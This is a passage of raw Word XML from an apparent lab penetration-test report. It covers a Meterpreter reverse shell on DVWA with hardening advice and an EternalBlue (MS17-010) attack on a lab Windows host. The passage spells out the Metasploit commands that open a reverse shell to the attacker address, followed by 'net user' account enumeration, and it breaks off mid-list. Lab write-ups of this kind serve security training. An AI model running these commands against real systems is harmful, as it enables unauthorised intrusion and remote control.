          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Key Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE4DF3C" w14:textId="24CF3F3C" w:rsidR="00D27E59" w:rsidRPr="00D27E59" w:rsidRDefault="00D27E59" w:rsidP="00E316D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-DE" w:eastAsia="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-DE" w:eastAsia="en-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26A03A2F" wp14:editId="11F8A6E9">
            <wp:extent cx="4937760" cy="4463503"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1102626523"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26523" name="Picture 54"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45775" cy="4470748"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7F49B4" w14:textId="0AFE57A1" w:rsidR="00D27E59" w:rsidRPr="006D7729" w:rsidRDefault="00D27E59" w:rsidP="00E316D3">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D7729">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="001A7290" w:rsidRPr="006D7729">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidRPr="006D7729">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D7729">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Active Meterpreter session with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D7729">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006D7729">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243B662B" w14:textId="77777777" w:rsidR="00D27E59" w:rsidRPr="00D27E59" w:rsidRDefault="00D27E59" w:rsidP="00D27E59">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:br/>
        <w:t>The reverse shell provided full control of the DVWA server, enabling persistent post-exploitation activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CB4921" w14:textId="77777777" w:rsidR="00D27E59" w:rsidRPr="00D27E59" w:rsidRDefault="00D27E59" w:rsidP="00D27E59">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C131BC" w14:textId="77777777" w:rsidR="00D27E59" w:rsidRPr="00D27E59" w:rsidRDefault="00D27E59" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Enforce strict file upload validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389DBC5C" w14:textId="77777777" w:rsidR="00D27E59" w:rsidRPr="00D27E59" w:rsidRDefault="00D27E59" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Disable execution permissions on upload directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164FDEB4" w14:textId="77777777" w:rsidR="00D27E59" w:rsidRPr="00D27E59" w:rsidRDefault="00D27E59" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Restrict outbound network connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111F6B99" w14:textId="77777777" w:rsidR="00D27E59" w:rsidRPr="00D27E59" w:rsidRDefault="00D27E59" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Monitor traffic with IDS/IPS and SIEM tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6F75A4" w14:textId="77777777" w:rsidR="00D27E59" w:rsidRPr="00D27E59" w:rsidRDefault="00D27E59" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Use EDR to detect reverse shells and post-exploitation </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38010319" w14:textId="77777777" w:rsidR="00D27E59" w:rsidRPr="00D27E59" w:rsidRDefault="00D27E59" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E59">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Apply network segmentation to limit attacker movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754B9974" w14:textId="0E6B98E8" w:rsidR="00D27E59" w:rsidRDefault="001F4E85" w:rsidP="00D27E59">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007A592E">
        <w:t>The DVWA application was found to be vulnerable to SQL Injection, Stored XSS, Unrestricted File Upload, and Reverse Meterpreter Shell execution. Each vulnerability was exploited successfully, demonstrating the potential for database compromise, session hijacking, arbitrary command execution, and persistent remote control. These findings underscore the importance of secure coding practices, layered defenses, proper system configuration, and continuous monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756EB045" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="003D4DCD">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Windows Exploitation and Password Security Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260BEB8A" w14:textId="315DC9B4" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="00E717EA">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">This section details the exploitation of the Windows Victim-Laptop (192.168.57.20) using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability, followed by local account enumeration, weak password list creation, and successful brute-force authentication with Hydra. Evidence was captured at each stage, and findings were </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>analyzed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> with remediation recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3257CBED" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="003D4DCD">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Exploiting Windows SMB via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D36FED0"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b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Commands Executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DA68D8"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use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">/ms17_010_eternalblue  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F52D43"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lastRenderedPageBreak/>
        <w:t>set payload windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D65AD9"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set RHOSTS 192.168.57.20  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24682C2C"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set LHOST 192.168.57.10  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7358D8"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set LPORT 5555  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23242D8A"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run  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF3BD28" w14:textId="64145BFC" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="00B50C38" w:rsidP="003D4DCD">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52F27706" wp14:editId="791C2673">
            <wp:extent cx="5943600" cy="4919345"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1352482084"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82084" name="Picture 55"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919345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAC7FF2" w14:textId="1F90A673" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="00FB28AA" w:rsidP="00FB28AA">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00855C35">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00585CFB" w:rsidRPr="00855C35">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidR="003D4DCD" w:rsidRPr="00855C35">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003D4DCD" w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploit console showing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D4DCD" w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D4DCD" w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0470678C" w14:textId="408EF2BD" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="006E4DD6">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> (MS17-010) exploit successfully executed, opening a Meterpreter reverse shell from the target (192.168.57.20) back to the attacker (192.168.57.10:5555). This </w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>confirmed the system was vulnerable to remote code execution through the unpatched SMBv1 service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6741069A" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="003D4DCD">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>2. User Enumeration via Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A72A3F"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b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Commands Executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0C86BB"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shell  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67999796"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net user  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5945AA"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b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Accounts Discovered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD23B04" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252EBB08" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Guest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC9ECB0" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
